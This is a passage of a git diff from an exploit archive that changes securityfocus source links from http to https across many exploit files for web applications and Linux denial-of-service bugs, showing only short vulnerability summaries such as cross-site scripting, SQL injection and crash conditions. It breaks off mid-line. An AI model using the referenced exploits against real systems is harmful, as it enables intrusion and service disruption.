input. diff --git a/exploits/jsp/webapps/31475.txt b/exploits/jsp/webapps/31475.txt index 3d3e88cf4..df615b07d 100644 --- a/exploits/jsp/webapps/31475.txt +++ b/exploits/jsp/webapps/31475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28411/info +source: https://www.securityfocus.com/bid/28411/info Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32046.txt b/exploits/jsp/webapps/32046.txt index 5ddbdd5cc..65ba17f28 100644 --- a/exploits/jsp/webapps/32046.txt +++ b/exploits/jsp/webapps/32046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30180/info +source: https://www.securityfocus.com/bid/30180/info IBM Maximo is prone to multiple HTML-injection vulnerabilities and an information-disclosure vulnerability. diff --git a/exploits/jsp/webapps/32249.txt b/exploits/jsp/webapps/32249.txt index 8e8d6c268..2b9e00c00 100644 --- a/exploits/jsp/webapps/32249.txt +++ b/exploits/jsp/webapps/32249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30696/info +source: https://www.securityfocus.com/bid/30696/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32423.txt b/exploits/jsp/webapps/32423.txt index 764f79474..e4b8757fe 100644 --- a/exploits/jsp/webapps/32423.txt +++ b/exploits/jsp/webapps/32423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31410/info +source: https://www.securityfocus.com/bid/31410/info OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32424.txt b/exploits/jsp/webapps/32424.txt index 0ad5f9f64..7ba58fd38 100644 --- a/exploits/jsp/webapps/32424.txt +++ b/exploits/jsp/webapps/32424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31410/info +source: https://www.securityfocus.com/bid/31410/info OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32425.txt b/exploits/jsp/webapps/32425.txt index b726f0cf0..2613c0223 100644 --- a/exploits/jsp/webapps/32425.txt +++ b/exploits/jsp/webapps/32425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31410/info +source: https://www.securityfocus.com/bid/31410/info OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32579.html b/exploits/jsp/webapps/32579.html index 0fe962540..c0ad69f27 100644 --- a/exploits/jsp/webapps/32579.html +++ b/exploits/jsp/webapps/32579.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32262/info +source: https://www.securityfocus.com/bid/32262/info Sun Java System Identity Manager is prone to multiple web-interface vulnerabilities, including a cross-site request-forgery issue, multiple cross-site scripting issues, multiple HTML-injection issues, and a directory-traversal vulnerability. diff --git a/exploits/jsp/webapps/32655.txt b/exploits/jsp/webapps/32655.txt index 196541c5e..c33fbf9d0 100644 --- a/exploits/jsp/webapps/32655.txt +++ b/exploits/jsp/webapps/32655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32782/info +source: https://www.securityfocus.com/bid/32782/info Multiple Ad Server Solutions products are prone to SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/jsp/webapps/32677.txt b/exploits/jsp/webapps/32677.txt index dbeb5237a..088a1516e 100644 --- a/exploits/jsp/webapps/32677.txt +++ b/exploits/jsp/webapps/32677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32937/info +source: https://www.securityfocus.com/bid/32937/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32678.txt b/exploits/jsp/webapps/32678.txt index 784c57611..b1469b1a0 100644 --- a/exploits/jsp/webapps/32678.txt +++ b/exploits/jsp/webapps/32678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32938/info +source: https://www.securityfocus.com/bid/32938/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32679.txt b/exploits/jsp/webapps/32679.txt index 0e2bd8392..ae5a2e19c 100644 --- a/exploits/jsp/webapps/32679.txt +++ b/exploits/jsp/webapps/32679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32940/info +source: https://www.securityfocus.com/bid/32940/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32680.txt b/exploits/jsp/webapps/32680.txt index 19a474f29..14e7de883 100644 --- a/exploits/jsp/webapps/32680.txt +++ b/exploits/jsp/webapps/32680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32945/info +source: https://www.securityfocus.com/bid/32945/info Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32708.txt b/exploits/jsp/webapps/32708.txt index 5616e2aa6..78aba8982 100644 --- a/exploits/jsp/webapps/32708.txt +++ b/exploits/jsp/webapps/32708.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33153/info +source: https://www.securityfocus.com/bid/33153/info Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32709.txt b/exploits/jsp/webapps/32709.txt index c38e2b28a..eb3776e7d 100644 --- a/exploits/jsp/webapps/32709.txt +++ b/exploits/jsp/webapps/32709.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33153/info +source: https://www.securityfocus.com/bid/33153/info Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32710.txt b/exploits/jsp/webapps/32710.txt index 02597bbd9..644490d6a 100644 --- a/exploits/jsp/webapps/32710.txt +++ b/exploits/jsp/webapps/32710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33153/info +source: https://www.securityfocus.com/bid/33153/info Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32741.txt b/exploits/jsp/webapps/32741.txt index adf2386bc..c258bfc77 100644 --- a/exploits/jsp/webapps/32741.txt +++ b/exploits/jsp/webapps/32741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33360/info +source: https://www.securityfocus.com/bid/33360/info Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/32742.txt b/exploits/jsp/webapps/32742.txt index 9f71f65bd..d0b8ed357 100644 --- a/exploits/jsp/webapps/32742.txt +++ b/exploits/jsp/webapps/32742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33360/info +source: https://www.securityfocus.com/bid/33360/info Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/33209.txt b/exploits/jsp/webapps/33209.txt index 66d8dfc51..ba7c1eb5c 100644 --- a/exploits/jsp/webapps/33209.txt +++ b/exploits/jsp/webapps/33209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36245/info +source: https://www.securityfocus.com/bid/36245/info Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges. diff --git a/exploits/jsp/webapps/33292.txt b/exploits/jsp/webapps/33292.txt index 8dd4351fd..58304ed8b 100644 --- a/exploits/jsp/webapps/33292.txt +++ b/exploits/jsp/webapps/33292.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36721/info +source: https://www.securityfocus.com/bid/36721/info IBM Rational RequisitePro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33293.txt b/exploits/jsp/webapps/33293.txt index 515671d98..2f0dcbcfe 100644 --- a/exploits/jsp/webapps/33293.txt +++ b/exploits/jsp/webapps/33293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36721/info +source: https://www.securityfocus.com/bid/36721/info IBM Rational RequisitePro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33346.txt b/exploits/jsp/webapps/33346.txt index 860c25133..3de322656 100644 --- a/exploits/jsp/webapps/33346.txt +++ b/exploits/jsp/webapps/33346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37003/info +source: https://www.securityfocus.com/bid/37003/info McAfee Network Security Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33347.txt b/exploits/jsp/webapps/33347.txt index 091fa3c53..4c0933b51 100644 --- a/exploits/jsp/webapps/33347.txt +++ b/exploits/jsp/webapps/33347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37004/info +source: https://www.securityfocus.com/bid/37004/info McAfee Network Security Manager is prone to an information-disclosure vulnerability because it fails to properly protect sensitive cookie data with the 'HTTPOnly' protection mechanism. diff --git a/exploits/jsp/webapps/33564.txt b/exploits/jsp/webapps/33564.txt index 768828695..df0f73064 100644 --- a/exploits/jsp/webapps/33564.txt +++ b/exploits/jsp/webapps/33564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37927/info +source: https://www.securityfocus.com/bid/37927/info Jetty is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/33596.txt b/exploits/jsp/webapps/33596.txt index e5385955a..c0075cf07 100644 --- a/exploits/jsp/webapps/33596.txt +++ b/exploits/jsp/webapps/33596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38094/info +source: https://www.securityfocus.com/bid/38094/info KnowGate hipergate is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33675.txt b/exploits/jsp/webapps/33675.txt index ccf106060..ffa312d91 100644 --- a/exploits/jsp/webapps/33675.txt +++ b/exploits/jsp/webapps/33675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38412/info +source: https://www.securityfocus.com/bid/38412/info Multiple IBM products are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33678.txt b/exploits/jsp/webapps/33678.txt index 96e906338..dc11910a1 100644 --- a/exploits/jsp/webapps/33678.txt +++ b/exploits/jsp/webapps/33678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38441/info +source: https://www.securityfocus.com/bid/38441/info ARISg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33691.txt b/exploits/jsp/webapps/33691.txt index 5b64d142c..6c1e7820b 100644 --- a/exploits/jsp/webapps/33691.txt +++ b/exploits/jsp/webapps/33691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38534/info +source: https://www.securityfocus.com/bid/38534/info Comptel Provisioning and Activation is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33779.txt b/exploits/jsp/webapps/33779.txt index 301f58208..98002e831 100644 --- a/exploits/jsp/webapps/33779.txt +++ b/exploits/jsp/webapps/33779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38879/info +source: https://www.securityfocus.com/bid/38879/info agXchange ESM is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33785.txt b/exploits/jsp/webapps/33785.txt index c3306bf6d..6946ee920 100644 --- a/exploits/jsp/webapps/33785.txt +++ b/exploits/jsp/webapps/33785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38896/info +source: https://www.securityfocus.com/bid/38896/info agXchange ESM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34092.txt b/exploits/jsp/webapps/34092.txt index 7f5eb0c66..5b8439113 100644 --- a/exploits/jsp/webapps/34092.txt +++ b/exploits/jsp/webapps/34092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40600/info +source: https://www.securityfocus.com/bid/40600/info JForum is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/jsp/webapps/34179.txt b/exploits/jsp/webapps/34179.txt index 2e7b845b4..1aa8ccd54 100644 --- a/exploits/jsp/webapps/34179.txt +++ b/exploits/jsp/webapps/34179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41030/info +source: https://www.securityfocus.com/bid/41030/info IBM WebSphere ILOG JRules is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34370.txt b/exploits/jsp/webapps/34370.txt index f6b7b6e48..f17567c60 100644 --- a/exploits/jsp/webapps/34370.txt +++ b/exploits/jsp/webapps/34370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41925/info +source: https://www.securityfocus.com/bid/41925/info SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34384.txt b/exploits/jsp/webapps/34384.txt index 7b78a152d..c558c7aa7 100644 --- a/exploits/jsp/webapps/34384.txt +++ b/exploits/jsp/webapps/34384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42025/info +source: https://www.securityfocus.com/bid/42025/info Jira is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34440.txt b/exploits/jsp/webapps/34440.txt index e60c3ddbf..124f3f493 100644 --- a/exploits/jsp/webapps/34440.txt +++ b/exploits/jsp/webapps/34440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42413/info +source: https://www.securityfocus.com/bid/42413/info Computer Associates Oneview Monitor is prone to a remote code-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34834.txt b/exploits/jsp/webapps/34834.txt index 7846b83a3..4865edeff 100644 --- a/exploits/jsp/webapps/34834.txt +++ b/exploits/jsp/webapps/34834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43954/info +source: https://www.securityfocus.com/bid/43954/info Oracle Fusion Middleware is prone to a cross-site scripting vulnerability in BPEL Console. diff --git a/exploits/jsp/webapps/35169.txt b/exploits/jsp/webapps/35169.txt index 9b0e03ce2..07a4a394f 100644 --- a/exploits/jsp/webapps/35169.txt +++ b/exploits/jsp/webapps/35169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45682/info +source: https://www.securityfocus.com/bid/45682/info Openfire is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/jsp/webapps/35672.txt b/exploits/jsp/webapps/35672.txt index f7e8432a2..b23877729 100644 --- a/exploits/jsp/webapps/35672.txt +++ b/exploits/jsp/webapps/35672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47607/info +source: https://www.securityfocus.com/bid/47607/info Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/jsp/webapps/35706.txt b/exploits/jsp/webapps/35706.txt index f8815d219..4ce6a6650 100644 --- a/exploits/jsp/webapps/35706.txt +++ b/exploits/jsp/webapps/35706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47728/info +source: https://www.securityfocus.com/bid/47728/info BMC Remedy Knowledge Management is prone to a default-account vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/35707.txt b/exploits/jsp/webapps/35707.txt index 08fb778ad..971fdc31f 100644 --- a/exploits/jsp/webapps/35707.txt +++ b/exploits/jsp/webapps/35707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47731/info +source: https://www.securityfocus.com/bid/47731/info BMC Dashboards is prone to to multiple information-disclosure and cross-site scripting issues because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36275.txt b/exploits/jsp/webapps/36275.txt index 637f81b5f..0eedc592b 100644 --- a/exploits/jsp/webapps/36275.txt +++ b/exploits/jsp/webapps/36275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50456/info +source: https://www.securityfocus.com/bid/50456/info Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities. diff --git a/exploits/jsp/webapps/36353.txt b/exploits/jsp/webapps/36353.txt index 2e43a77b6..a49e2c699 100644 --- a/exploits/jsp/webapps/36353.txt +++ b/exploits/jsp/webapps/36353.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36354.txt b/exploits/jsp/webapps/36354.txt index a23372f21..a1e6e469c 100644 --- a/exploits/jsp/webapps/36354.txt +++ b/exploits/jsp/webapps/36354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36355.txt b/exploits/jsp/webapps/36355.txt index d5704535f..7fe5fb45c 100644 --- a/exploits/jsp/webapps/36355.txt +++ b/exploits/jsp/webapps/36355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36356.txt b/exploits/jsp/webapps/36356.txt index 3b1649d1e..043af7bfd 100644 --- a/exploits/jsp/webapps/36356.txt +++ b/exploits/jsp/webapps/36356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36357.txt b/exploits/jsp/webapps/36357.txt index 48acb3d03..5b662c2fc 100644 --- a/exploits/jsp/webapps/36357.txt +++ b/exploits/jsp/webapps/36357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36929.txt b/exploits/jsp/webapps/36929.txt index 0a3199796..4de3aa5d9 100644 --- a/exploits/jsp/webapps/36929.txt +++ b/exploits/jsp/webapps/36929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52356/info +source: https://www.securityfocus.com/bid/52356/info Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/37220.txt b/exploits/jsp/webapps/37220.txt index 5c6aa07cf..c16c2c3d2 100644 --- a/exploits/jsp/webapps/37220.txt +++ b/exploits/jsp/webapps/37220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53602/info +source: https://www.securityfocus.com/bid/53602/info OpenKM is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/jsp/webapps/37221.txt b/exploits/jsp/webapps/37221.txt index b4ca3a5ef..586c82107 100644 --- a/exploits/jsp/webapps/37221.txt +++ b/exploits/jsp/webapps/37221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53603/info +source: https://www.securityfocus.com/bid/53603/info The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data. diff --git a/exploits/jsp/webapps/37467.txt b/exploits/jsp/webapps/37467.txt index 9f4a885b9..0561669aa 100644 --- a/exploits/jsp/webapps/37467.txt +++ b/exploits/jsp/webapps/37467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54235/info +source: https://www.securityfocus.com/bid/54235/info TEMENOS T24 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/37550.txt b/exploits/jsp/webapps/37550.txt index 068ffc6c8..4a0196488 100644 --- a/exploits/jsp/webapps/37550.txt +++ b/exploits/jsp/webapps/37550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54733/info +source: https://www.securityfocus.com/bid/54733/info DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities. diff --git a/exploits/jsp/webapps/37802.html b/exploits/jsp/webapps/37802.html index 74716acc8..b9af7f234 100644 --- a/exploits/jsp/webapps/37802.html +++ b/exploits/jsp/webapps/37802.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55561/info +source: https://www.securityfocus.com/bid/55561/info IFOBS is prone to multiple HTML-injection vulnerabilities. diff --git a/exploits/jsp/webapps/38235.txt b/exploits/jsp/webapps/38235.txt index 698b32e86..52f4d4d25 100644 --- a/exploits/jsp/webapps/38235.txt +++ b/exploits/jsp/webapps/38235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57514/info +source: https://www.securityfocus.com/bid/57514/info Perforce P4Web is prone to multiple cross site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/38334.txt b/exploits/jsp/webapps/38334.txt index 4181f8bab..98d02d3ec 100644 --- a/exploits/jsp/webapps/38334.txt +++ b/exploits/jsp/webapps/38334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58164/info +source: https://www.securityfocus.com/bid/58164/info JForum is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/jsp/webapps/38460.txt b/exploits/jsp/webapps/38460.txt index 452fffedf..b9505d286 100644 --- a/exploits/jsp/webapps/38460.txt +++ b/exploits/jsp/webapps/38460.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59030/info +source: https://www.securityfocus.com/bid/59030/info jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/38816.html b/exploits/jsp/webapps/38816.html index 2a7cd628d..c24bddd2f 100644 --- a/exploits/jsp/webapps/38816.html +++ b/exploits/jsp/webapps/38816.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63363/info +source: https://www.securityfocus.com/bid/63363/info JReport is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/jsp/webapps/39142.txt b/exploits/jsp/webapps/39142.txt index e2417892d..99584ae02 100644 --- a/exploits/jsp/webapps/39142.txt +++ b/exploits/jsp/webapps/39142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66817/info +source: https://www.securityfocus.com/bid/66817/info Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities. diff --git a/exploits/jsp/webapps/39143.txt b/exploits/jsp/webapps/39143.txt index aefaac0b0..c991f7a45 100644 --- a/exploits/jsp/webapps/39143.txt +++ b/exploits/jsp/webapps/39143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66817/info +source: https://www.securityfocus.com/bid/66817/info Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities. diff --git a/exploits/jsp/webapps/9887.txt b/exploits/jsp/webapps/9887.txt index 7749778d3..78e0b057e 100644 --- a/exploits/jsp/webapps/9887.txt +++ b/exploits/jsp/webapps/9887.txt @@ -387,9 +387,9 @@ IX. REFERENCES [4] Terminal Emulator Security Issues http://marc.info/?l=bugtraq&m=104612710031920&w=2 [5] Eterm Screen Dump Escape Sequence Local File Corruption Vulnerability - http://www.securityfocus.com/bid/6936/discuss + https://www.securityfocus.com/bid/6936/discuss [6] RXVT Screen Dump Escape Sequence Local File Corruption Vulnerability - http://www.securityfocus.com/bid/6938/discuss + https://www.securityfocus.com/bid/6938/discuss X. CREDIT diff --git a/exploits/linux/dos/14573.txt b/exploits/linux/dos/14573.txt index 6ae4d3d8e..5cbe1e8e8 100644 --- a/exploits/linux/dos/14573.txt +++ b/exploits/linux/dos/14573.txt @@ -1,4 +1,4 @@ -From: http://www.securityfocus.com/bid/41480/ +From: https://www.securityfocus.com/bid/41480/ LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. Due to the nature of this issue, attackers may be able to execute arbitrary code, but this has not been confirmed. diff --git a/exploits/linux/dos/15619.c b/exploits/linux/dos/15619.c index 7b474c2e3..4a6ddb60a 100644 --- a/exploits/linux/dos/15619.c +++ b/exploits/linux/dos/15619.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/44301/info +// source: https://www.securityfocus.com/bid/44301/info /* known for over a year, fixed in grsec bug is due to a bad limit on the max size of the stack for 32bit apps on a 64bit OS. Instead of them being limited to 1/4th of a 32bit diff --git a/exploits/linux/dos/15732.txt b/exploits/linux/dos/15732.txt index 35621e593..87efc4ab0 100644 --- a/exploits/linux/dos/15732.txt +++ b/exploits/linux/dos/15732.txt @@ -1,4 +1,4 @@ -Source: http://www.securityfocus.com/bid/45162/info +Source: https://www.securityfocus.com/bid/45162/info FontForge is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/linux/dos/15974.txt b/exploits/linux/dos/15974.txt index 28c0030fe..8d981875c 100644 --- a/exploits/linux/dos/15974.txt +++ b/exploits/linux/dos/15974.txt @@ -1,5 +1,5 @@ Sources: https://www.chrishowie.com/2010/11/24/mutable-strings-in-mono/ -http://www.securityfocus.com/bid/45051/info +https://www.securityfocus.com/bid/45051/info Mono and Moonlight is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/dos/18225.c b/exploits/linux/dos/18225.c index fe2bc72e9..b4210def4 100644 --- a/exploits/linux/dos/18225.c +++ b/exploits/linux/dos/18225.c @@ -1,3 +1,4 @@ +/* ############################################################################ # Exploit Title: CSF Firewall Buffer overflow p0c # DownLoaD : http://www.configserver.com/free/csf.tgz @@ -10,6 +11,7 @@ ============================================================================== FiLe : CSF.c +*/ /* * Copyright 2006-2011, Way to the Web Limited diff --git a/exploits/linux/dos/19075.c b/exploits/linux/dos/19075.c index 9c91413e2..838113586 100644 --- a/exploits/linux/dos/19075.c +++ b/exploits/linux/dos/19075.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/83/info +// source: https://www.securityfocus.com/bid/83/info // // APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549. // diff --git a/exploits/linux/dos/19076.txt b/exploits/linux/dos/19076.txt index 750585fdc..11eda934e 100644 --- a/exploits/linux/dos/19076.txt +++ b/exploits/linux/dos/19076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/84/info +source: https://www.securityfocus.com/bid/84/info There appears to be a buffer overflow in Apple's Personal Web Sharing 1.1. If you connect to its TCP port number 80 and send it a string over three thousand bytes long followed by two return characters Personal Web Sharing will stop servicing request. diff --git a/exploits/linux/dos/19082.txt b/exploits/linux/dos/19082.txt index 796b0c874..6f44ae803 100644 --- a/exploits/linux/dos/19082.txt +++ b/exploits/linux/dos/19082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/105/info +source: https://www.securityfocus.com/bid/105/info A bug in Advance Micro Devices K6 processor allows non-privileged code to crash the machine. diff --git a/exploits/linux/dos/19085.c b/exploits/linux/dos/19085.c index b4e073755..4ba2f2c24 100644 --- a/exploits/linux/dos/19085.c +++ b/exploits/linux/dos/19085.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/111/info +source: https://www.securityfocus.com/bid/111/info A vulnerability in the Linux kernel allows any user to send a SIGIO signal to any process. If the process does not catch or ignore the signal is will exit. */ diff --git a/exploits/linux/dos/19103.c b/exploits/linux/dos/19103.c index 36c3924b6..a27daf440 100644 --- a/exploits/linux/dos/19103.c +++ b/exploits/linux/dos/19103.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/124/info +// source: https://www.securityfocus.com/bid/124/info The Teardrop denial of service attack exploits a flaw inherent to multiple vendor TCP/IP stacks. This problem is related to how the TCP/IP stack handle reassembly of fragmented IP packets. diff --git a/exploits/linux/dos/19241.c b/exploits/linux/dos/19241.c index 61e66a3d6..6818a1c40 100644 --- a/exploits/linux/dos/19241.c +++ b/exploits/linux/dos/19241.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/302/info +source: https://www.securityfocus.com/bid/302/info A vulnerability in the Linux Kernel's IPv4 option processing may allow a remote user to crash the system. diff --git a/exploits/linux/dos/19250.txt b/exploits/linux/dos/19250.txt index 32672fdd4..7867493ac 100644 --- a/exploits/linux/dos/19250.txt +++ b/exploits/linux/dos/19250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/312/info +source: 